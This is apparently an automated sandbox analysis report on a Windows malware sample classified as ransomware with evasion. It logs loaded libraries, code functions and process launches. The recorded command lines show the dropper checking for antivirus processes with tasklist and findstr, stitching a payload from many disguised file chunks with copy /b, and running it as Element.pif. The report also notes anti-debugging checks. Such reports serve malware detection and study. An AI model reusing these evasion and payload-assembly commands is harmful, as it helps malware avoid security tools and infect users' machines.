Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C51E3021_2_0000021925C51E30
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D45D0421_2_0000021925D45D04
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C5C8E021_2_0000021925C5C8E0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C6D8B021_2_0000021925C6D8B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D5F8A821_2_0000021925D5F8A8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D3A80C21_2_0000021925D3A80C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D5780421_2_0000021925D57804
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CCC78021_2_0000021925CCC780
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CDE75021_2_0000021925CDE750
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C5472921_2_0000021925C54729
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C71A4021_2_0000021925C71A40
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D43A1821_2_0000021925D43A18
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4598021_2_0000021925D45980
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925CC99B021_2_0000021925CC99B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B16D021_2_00007FF6C58B16D0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A76EC21_2_00007FF6C58A76EC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58AA65021_2_00007FF6C58AA650
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B668021_2_00007FF6C58B6680
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A15E021_2_00007FF6C58A15E0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C587282021_2_00007FF6C5872820
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588182021_2_00007FF6C5881820
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589F76021_2_00007FF6C589F760
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C587879021_2_00007FF6C5878790
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A827021_2_00007FF6C58A8270
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588626021_2_00007FF6C5886260
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B229021_2_00007FF6C58B2290
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589C28C21_2_00007FF6C589C28C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C591C28421_2_00007FF6C591C284
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58724D421_2_00007FF6C58724D4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C587452821_2_00007FF6C5874528
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589549C21_2_00007FF6C589549C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A936021_2_00007FF6C58A9360
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589436421_2_00007FF6C5894364
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C587AEC021_2_00007FF6C587AEC0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5882EE021_2_00007FF6C5882EE0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A7DFC21_2_00007FF6C58A7DFC
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C591AE1021_2_00007FF6C591AE10
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589BD4421_2_00007FF6C589BD44
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5883D7021_2_00007FF6C5883D70
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B512C21_2_00007FF6C58B512C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588203B21_2_00007FF6C588203B
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588F07021_2_00007FF6C588F070
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C589BFC021_2_00007FF6C589BFC0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5921F4021_2_00007FF6C5921F40
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A2F6C21_2_00007FF6C58A2F6C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588EAA821_2_00007FF6C588EAA8
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C588095021_2_00007FF6C5880950
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C587B9B021_2_00007FF6C587B9B0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B6C7421_2_00007FF6C58B6C74
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5908CB021_2_00007FF6C5908CB0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2BB021_2_00007FF6C58B2BB0
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\473638\Element.pif 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6196 -s 692
Source: wWk9NkXYcL.exe, 00000000.00000002.1253074310.00000000007DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs wWk9NkXYcL.exe
Source: wWk9NkXYcL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal100.rans.evad.winEXE@25/34@1/2
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58F4124 GetLastError,FormatMessageW,21_2_00007FF6C58F4124
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040400B
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58EC46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,21_2_00007FF6C58EC46C
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00402218 CoCreateInstance,0_2_00402218
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58F368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,21_2_00007FF6C58F368C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifMutant created: \Sessions\1\BaseNamedObjects\JarakHalgWW_13
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6768:120:WilError_03
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile created: C:\Users\user~1\AppData\Local\Temp\nskEC.tmpJump to behavior
Source: wWk9NkXYcL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: wWk9NkXYcL.exeReversingLabs: Detection: 34%
Source: wWk9NkXYcL.exeString found in binary or memory: s/Add:
Source: wWk9NkXYcL.exeString found in binary or memory: -fns/_lib/addLead"
Source: wWk9NkXYcL.exeString found in binary or memory: /AddJ
Source: wWk9NkXYcL.exeString found in binary or memory: in-add
Source: wWk9NkXYcL.exeString found in binary or memory: ./Add+6
Source: wWk9NkXYcL.exeString found in binary or memory: ./Add+6s
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeFile read: C:\Users\user\Desktop\wWk9NkXYcL.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\wWk9NkXYcL.exe "C:\Users\user\Desktop\wWk9NkXYcL.exe"
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 473638
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif Element.pif Q
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif C:\Users\user~1\AppData\Local\Temp\473638\Element.pif
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6196 -s 692
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exitJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 473638Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "MaskBathroomCompositionInjection" Participants Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint QJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif Element.pif QJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess created: C:\Users\user\AppData\Local\Temp\473638\Element.pif C:\Users\user~1\AppData\Local\Temp\473638\Element.pifJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: webio.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: wWk9NkXYcL.exeStatic file information: File size 23265280 > 1048576
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405BBF GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405BBF
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925C76068 push rsi; ret 21_2_0000021925C76078
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A76AD push rdi; ret 21_2_00007FF6C58A76B4
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58A7149 push rdi; ret 21_2_00007FF6C58A7152

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\473638\Element.pifJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\473638\Element.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5894364 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,21_2_00007FF6C5894364
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifAPI coverage: 0.7 %
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00405B98 FindFirstFileW,FindClose,0_2_00405B98
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_00406559 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406559
Source: C:\Users\user\Desktop\wWk9NkXYcL.exeCode function: 0_2_004029F1 FindFirstFileW,0_2_004029F1
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58ECE3C GetFileAttributesW,FindFirstFileW,FindClose,21_2_00007FF6C58ECE3C
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C58B2DE0 FindFirstFileExW,21_2_00007FF6C58B2DE0
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5875C44 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,21_2_00007FF6C5875C44
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\473638\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
Source: Element.pif, 00000015.00000002.2502705369.0000021925E50000.00000004.00000020.00020000.00000000.sdmp, Element.pif, 00000015.00000002.2502705369.0000021925EA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_0000021925D4C004 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_0000021925D4C004
Source: C:\Users\user\AppData\Local\Temp\473638\Element.pifCode function: 21_2_00007FF6C5895A40 GetLastError,IsDebuggerPresent,OutputDebugStringW,21_2_00007FF6C5895A40
